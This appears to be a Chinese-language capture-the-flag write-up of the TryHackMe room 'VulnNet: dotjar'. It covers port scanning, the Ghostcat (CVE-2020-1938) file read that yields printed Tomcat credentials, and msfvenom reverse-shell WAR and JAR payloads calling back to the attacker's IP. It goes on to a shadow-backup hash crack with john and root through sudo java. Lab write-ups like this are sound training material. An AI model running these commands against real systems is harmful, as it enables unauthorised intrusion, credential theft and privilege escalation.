打靶记录(八十)之THMVulnNetdotjar

端口扫描

nmap --min-rate=10000 -p- 10.10.255.237
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-24 06:43 UTC
Nmap scan report for ip-10-10-255-237.eu-west-1.compute.internal (10.10.255.237)
Host is up (0.0091s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE
8009/tcp open  ajp13
8080/tcp open  http-proxy
MAC Address: 02:74:3F:1B:8A:3F (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 3.46 seconds

nmap -sT -sV -sC -O -p8009,8080 10.10.255.237
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-24 06:49 UTC
Nmap scan report for ip-10-10-255-237.eu-west-1.compute.internal (10.10.255.237)
Host is up (0.00044s latency).

PORT     STATE SERVICE VERSION
8009/tcp open  ajp13   Apache Jserv (Protocol v1.3)
| ajp-methods: 
|_  Supported methods: GET HEAD POST OPTIONS
8080/tcp open  http    Apache Tomcat 9.0.30
|_http-favicon: Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat/9.0.30
MAC Address: 02:74:3F:1B:8A:3F (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.13 (95%), Linux 3.8 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (92%), Linux 3.1 - 3.2 (92%), Linux 3.11 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.05 seconds

nmap --script=vuln -p8009,8080 10.10.255.237
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-24 06:50 UTC
Nmap scan report for ip-10-10-255-237.eu-west-1.compute.internal (10.10.255.237)
Host is up (0.00022s latency).

PORT     STATE SERVICE
8009/tcp open  ajp13
8080/tcp open  http-proxy
| http-enum: 
|   /examples/: Sample scripts
|   /manager/html/upload: Apache Tomcat (401 )
|   /manager/html: Apache Tomcat (401 )
|_  /docs/: Potentially interesting folder
MAC Address: 02:74:3F:1B:8A:3F (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 44.75 seconds

Getshell

发现8080端口是开了一个tomcat，但是尝试默认的tomcat/tomcat无法登录。也许得去了解一下Apache Jserv

发现和之前打的tomghost房间非常相似,尝试一下CVE-2020-1938

https://github.com/00theway/Ghostcat-CNVD-2020-10487.git

python3 ajpShooter.py http://10.10.255.237:8080 8009 /WEB-INF/web.xml read

找到一个凭据:

webdev:Hgj3LA$02D$Fa@21

虽然能够登陆，但是还是显示403，并做不了什么事情

但是我们可以上传war

.war 文件是一种 Java Web 应用程序归档文件（Web Application Archive）。它是一种使用 Java 技术构建和部署 Web 应用程序的常见方式。.war 文件实际上是一个 ZIP 归档，其中包含了用于在 Java Servlet 容器中运行的 Web 应用程序的所有必要资源和文件。

尝试上传一个反弹shell

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.11.38.245 LPORT=443 -f war -o shell1.war

curl --user 'webdev' --upload-file shell1.war "http://10.10.255.237:8080/manager/text/deploy?path=/shell/shell1.war"

然后浏览器访问/shell.shell1.war，得到反弹shell

转到到msf当中

没有什么方向，传个linpeas

提权

/var/shadow-backup-alt.gz似乎是可以读取的而且是shadow的备份

通过base64的方式下载下来，还需要/etc/passwd

unshadow passwd shadow >shadow.txt

john --wordlist=/usr/share/wordlists/rockyou.txt shadow.txt

得到了:

794613852 (jdk-admin)

切换用户，sudo -l发现可以以root身份执行jar包，再来个反弹shell

msfvenom -p java/shell_reverse_tcp LHOST=10.11.38.245 LPORT=443 -f jar -o shell.jar

上传之后开启监听执行:

sudo /usr/bin/java -jar shell.jar

我们是root!

碎碎念

又碰到了tomcat，记得今年的闽盾杯也有tomcat可惜当时不会捏。以及msf真好用